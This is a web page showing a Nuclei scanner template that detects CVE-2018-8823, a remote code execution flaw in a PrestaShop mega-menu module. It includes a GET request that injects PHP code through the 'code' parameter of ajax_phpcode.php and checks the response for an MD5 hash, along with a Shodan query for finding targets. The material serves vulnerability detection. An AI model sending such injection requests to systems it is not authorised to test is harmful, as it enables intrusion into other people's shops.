Skip to content
Nuclei Templates

PrestaShop Responsive Mega Menu Module - Remote Code Execution

ID: CVE-2018-8823

Severity: critical

Author: MaStErChO

Tags: cve,cve2018,prestashop,rce,sqli,responsive_mega_menu_pro_project

Description

Section titled “Description”

The ‘Responsive Mega Menu’ module for PrestaShop is prone to a remote code execution and SQL injection vulnerability. modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop allows remote attackers to execute an SQL injection or remote code execution through function calls in the code parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2018-8823


info:
  name: PrestaShop Responsive Mega Menu Module - Remote Code Execution
  author: MaStErChO
  severity: critical
  description: |
    The 'Responsive Mega Menu' module for PrestaShop is prone to a remote code execution and SQL injection vulnerability. modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop allows remote attackers to execute an SQL injection or remote code execution through function calls in the code parameter.
  reference:
    - https://vulners.com/openvas/OPENVAS:1361412562310144185
    - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
    - https://github.com/advisories/GHSA-q937-6mg8-6rgc
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8823
    - https://github.com/zapalm/prestashop-security-vulnerability-checker
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-8823
    cwe-id: CWE-94
    epss-score: 0.24062
    epss-percentile: 0.96593
    cpe: cpe:2.3:a:responsive_mega_menu_pro_project:responsive_mega_menu_pro:1.0.32:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: responsive_mega_menu_pro_project
    product: responsive_mega_menu_pro
    framework: prestashop
    shodan-query: http.component:"prestashop"
  tags: cve,cve2018,prestashop,rce,sqli,responsive_mega_menu_pro_project
variables:
  num: "999999999"


http:
  - method: GET
    path:
      - "{{BaseURL}}/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100960dd5855c6e496704a6d22cd0ed12c68648d87651b48a07dbe350701d11ea19022100e882a8d87d81eb121ae2df1271fe973ed7dca7fa04b1e34ddf50eaf4add2cc4e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-8823.yaml"

View on Github